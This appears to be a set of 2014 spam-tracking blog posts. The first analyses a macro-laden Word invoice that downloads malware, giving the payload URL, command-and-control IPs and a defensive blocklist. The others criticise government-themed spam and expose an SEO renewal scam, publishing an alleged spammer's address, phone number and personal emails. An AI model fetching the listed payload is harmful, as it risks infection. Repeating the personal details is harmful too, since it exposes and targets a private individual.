So far I have only seen one sample of this, with an attachment named Invoice 0215.doc which has zero detections according to VirusTotal. It contains an obfuscated Word macro which downloads an additional component from:

http://laikah.de/js/bin.exe

Usually there are two or three versions of this document, but I have only seen one. If  you look at the macro code itself, the download location is not encrypted in the code although other elements of the process are encrypted with a string + key combination. Those combinations contain non-printable characters, possibly in an attempt to avoid anaylsus,

This .exe file is downloaded as %TEMP%\345435.exe and it has a VirusTotal detection rate of 3/57.  Automated reporting tools [1] [2] [3] show that this POSTS to 37.139.47.105. It appears that communication is attempted with the following IPs:

37.139.47.105 (Pirix, Russia)
78.140.164.160 (Webazilla, US)
95.163.121.179 (Digital Networks, Russia)
86.104.134.156 (One Telecom, Moldova)
117.223.58.214 (BSNL / Broadband Multiplay, India)
109.234.38.70 (McHost, Russia)


Also, according to the Malwr report, a DLL is dropped with a detection rate of 3/57.

Recommended blocklist:
37.139.47.105
78.140.164.160
95.163.121.179
86.104.134.156
117.223.58.214
109.234.38.70

Wednesday, 15 October 2014

"Clean India" spam is an exercise in hypocrisy

"Clean India" is a meant to be a campaign to clean up Indian politics. But one of the biggest problems they have in India is spam (which lead to the long saga of Delhi minister Somnath Bharti's history of spam). So I think it is an act of sheer hypocrisy to promote this campaign through random spam.

From:     Ministry Of Urban Development [support@localcirclesemail.com]
Reply-To:     support@localcirclesemail.com
Date:     15 October 2014 11:24
Subject:     Swachh Bharat invite by Ministry Of Urban Development
Signed by:     localcirclesemail.com

Invited to Circle: Swachh Bharat
Founder: Ministry Of Urban Development
Members: 189975
Description: This circle brings together all citizens who want a Clean India. Through this circle, citizens will be able to share cleanliness initiatives, challenges, successes at a National Level as well as learn about best practices from each other. Members will also be able to give collective inputs to Ministry of Urban Development on an ongoing basis. Soon, members of this circle will have access to their local constituency circle on Swachh Bharat connecting them with fellow local residents and enabling them to organize/participate in clean up drives in their neighborhood/city. Together, let us make it a SWACHH BHARAT!


About LocalCircles
LocalCircles takes Social Media to the next level and makes it about Communities, Governance and Utility. It enables citizens to connect with communities for most aspects of urban daily life like Neighborhood, Constituency, City, Government, Causes, Interests and Needs, seek information/assistance when needed, come together for various initiatives and improve their urban daily life. LocalCircles is free for citizens and always will be! 

The spam originates from an Amazon AWS IP of 54.240.9.132, the spamvertised site localcircles.com is also hosted on Amazon AWS. The registration details are:

Registry Registrant ID:
Registrant Name: LocalCircles India
Registrant Organization: LocalCircles India Pvt Ltd
Registrant Street: 1105, 11th Floor,
Registrant Street: Advant Navis Business Park, Sector 142
Registrant City: Noida
Registrant State/Province: Uttar Pradesh
Registrant Postal Code: 201301
Registrant Country: India
Registrant Phone: +91.1204263558
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: info@localcircles.com


Google sums up localcircles.com poor reputation nicely: We've found that lots of messages from localcirclesemail.com are spam.

As long as India tolerates spam and other dishonest business practices then I don't think that there's much change of them cleaning up their act. I think whoever is sending out this spam needs to look much closer to home before criticising others.


Monday, 23 June 2014

"Domain Listing Expired" scam spam (ibulkmailer.com / 192.99.148.65)

I've received this spam to the contact details for several domains I own in the past few weeks:

Date:      Sun, 22 Jun 2014 07:53:10 +0200 [06/22/14 01:53:10 EDT]
From:      Domain Notification [chandan@gmail.com]
Reply-To:      chandan@gmail.com
Subject:      re: Domain Listing Expired

Attention: Important Notice

ATT: [redacted].COM
ADMINISTRATIVE CONTACT
[redacted].COM
[redacted]

[redacted].COM
Please ensure that your contact information is correct or make the necessary changes above

DOMAIN SERVICE NOTICE

Domain Name: [redacted].COM
Search Engine Submission

Pay By

June 30,2014
 PART I: REVIEW SOLICITATION


Attn: [redacted].COM
As a courtesy to domain name holders, we are sending you this notification for your business Domain name search engine registration. This letter is to inform you that it's time to send in your registration and save.

Failure to complete your Domain name search engine registration by the expiration date may result in cancellation of this offer making it difficult for your customers to locate you on the web.

Privatization allows the consumer a choice when registering. Search engine subscription includes domain name search engine submission. You are under no obligation to pay the amounts stated below unless you accept this offer. Do not discard, this notice is not an invoice it is a courtesy reminder to register your domain name search engine listing so your customers can locate you on the web.

This Notice for: [redacted].COM will expire on June 15,2014 Act today!

DETAIL OF SERVICE: ANNUAL WEBSITE SEARCH ENGINE SUBMISSION FOR DOMAIN NAME [redacted].COM
Detail of Service:
SEARCH SUBMISSIONS
Act by Date:
06/15/2014
For Domain
Name:
[redacted].COM


Select Term
Your Existing Domain
Period Covered
Price
    [redacted].COM        
1year     Valid for 1 Year CLICK TO RENEW     06/15/2014 - 06/15/2015     $75.00
2year     Valid for 2 Year CLICK TO RENEW     06/15/2014 - 06/15/2016     $119.00
3year     Valid for 3 Year CLICK TO RENEW     06/15/2014 - 06/15/2017     $199.00
4year     -Most Recommended- CLICK TO RENEW     04/04/2014 - 04/04/2024     $295.00
5year     Limited time offer - Best value! CLICK TO RENEW     Lifetime     $499.00


Payment by Credit Card
Select the term and complete the form above, (do not reply this mail with your credit card details on this mail , just click on pay above. once we receive your pay we will send you details and report after payment is successful, also make sure you provide us with your correct information at time of signup.

Unsubscribe me from this list


Powered by Interspire

It looks like a domain renewal notice.. but it isn't. It's a renewal notice for SEO services. "But wait," I hear you cry, "I haven't signed up for any SEO services!" to which my answer is "Exactly!"

This is where the spam moves from being annoying to being a more of a scam. The use of the word "Renew" implies that you already have a relationship with these people but you do not. There is nothing to renew, but stating that this is something you already use is not only incorrect but in my personal opinion it is a fraudulent misrepresentation.

The link in the email goes to 192.99.148.65 (OVH Canada, not surprisingly) and then onto a landing page at ibulkmailer.incom on 192.185.170.196 (Websitewelcome, US).


The WHOIS details for ibulkmailer.com are as follows:

Registry Registrant ID:
Registrant Name: kumar, chandan
Registrant Organization:
Registrant Street: DDA FLAT NO 556 PKT B HASTSAL
Registrant City: New Delhi
Registrant State/Province: Delhi
Registrant Postal Code: 110059
Registrant Country: IN
Registrant Phone: 7838808080
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: admin@ibulkmailer.com


WHOIS details can easily be faked, but the "Chandan" name in the registration details tallies with the address chandan@gmail.com in the spam itself.

An examination of the sites co-hosted with ibulkmailer.com along with several other identifying factors identity this website as belonging to Chandan Kumar of CNS Web Technologies Pvt Ltd (U72300DL2009PTC191574) of India.

To save you from having to do the analysis yourself, a shortcut is to visit Chandan Kumar's LinkedIn page which links through to ibulkmailer.com in one of the "Company Website" links.


The contact details for Mr Kumar's company are below:

CNS Web Technologies Private Limited
625 LIG HASTSAL
VIKAS PURI
New Delhi
Delhi
110059
INDIA
+91-7838808080
chandan988@gmail.com
chandan_988@rediffmail.com
chandan_988@yahoo.com

If you get these spam messages (and the link still leads to ibulkmailer.com) then one effective way of dealing with it would be to forward the message to the webhost abuse department at abuse -at- websitewelcome.com.

Doing business with spammers is never a good idea, and doing business with spammers who misrepresent your relationship with them is likely to be a very bad idea indeed. Avoid.

The following domains are also associated with CNS Web Technologies and Chandan Kumar. Do with them what you will.

ibulkmailer.com
webtrafficguru.net
ewebmail.in
ewebmailsolution.info
host-cns.com
cnswebtech.com
rajumehandiart.com
chauhanmehandiart.com
maahihosting.com
cnswebtech.com
cnsxpert.com
websms.co.in
ibulkmailer.in
domainnotices.in
ebizmail.in
pconlinexpert.com
turnaround-systems.com
ecataloguepromo.info